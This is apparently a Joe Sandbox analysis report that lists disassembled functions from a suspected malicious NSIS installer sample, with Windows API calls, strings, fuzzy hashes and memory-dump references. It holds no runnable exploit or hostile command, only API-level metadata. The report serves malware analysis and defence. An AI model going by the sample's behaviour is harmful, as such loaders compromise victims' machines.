Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58

Function 00404E7B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
GetMessagePos.USER32 ref: 00404E9E
ScreenToClient.USER32(?,?), ref: 00404EB8
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0

Strings

f, xrefs: 00404ECC

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4

Function 00401E73 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E76
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
ReleaseDC.USER32(?,00000000), ref: 00401EA9
CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8

Strings

Tahoma, xrefs: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C

Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
MulDiv.KERNEL32(000E1352,00000064,000E1C48), ref: 00403001
wsprintfW.USER32 ref: 00403011
SetWindowTextW.USER32(?,?), ref: 00403021
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033

Strings

verifying installer: %d%%, xrefs: 0040300B

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58

Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
GlobalFree.KERNEL32(?), ref: 00402A2B
GlobalFree.KERNEL32(00000000), ref: 00402A3E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8

Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68

Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401DBF
GetClientRect.USER32(?,?), ref: 00401E0A
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
DeleteObject.GDI32(00000000), ref: 00401E5E

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98

Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0

Strings

!, xrefs: 00401CA4

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98

Function 00404D6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
wsprintfW.USER32 ref: 00404E17
SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A

Strings

%u.%u%s%s, xrefs: 00404DF8

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8

Function 00405E10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403509,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403509,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405E10

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED

Function 00402663 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(eksegeternes), ref: 004026BA

Strings

eksegeternes, xrefs: 0040267E, 004026A3, 004026B5, 00402701
lftninger\slangetmmerens, xrefs: 004026A8

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: lstrlen
String ID: eksegeternes$lftninger\slangetmmerens
API String ID: 1659193697-3935130602
Opcode ID: afd31bb821aa055ad9d8af94a6d235f20367bb60df0860ec40d8552edd9562e5
Instruction ID: a3276bd60f4d5d6bb2aa79b2f1cf5674750ecc9aad51c5d7eefbc562b3e224a1
Opcode Fuzzy Hash: afd31bb821aa055ad9d8af94a6d235f20367bb60df0860ec40d8552edd9562e5
Instruction Fuzzy Hash: 7B112B71A10211BBCB00BBB19E469AE3B61AF50348F20443FF402B61C1DAFD8851631E

Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
GetTickCount.KERNEL32 ref: 0040306F
CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
ShowWindow.USER32(00000000,00000005), ref: 0040309A

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C

Function 00405F18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E

Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405EC9
Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6

lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405F71
GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405F81

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F18

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 3248276644-2382934351
Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE

Function 0040553A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405569
CallWindowProcW.USER32(?,?,?,?), ref: 004055BA

Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E

Strings

, xrefs: 0040554A

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
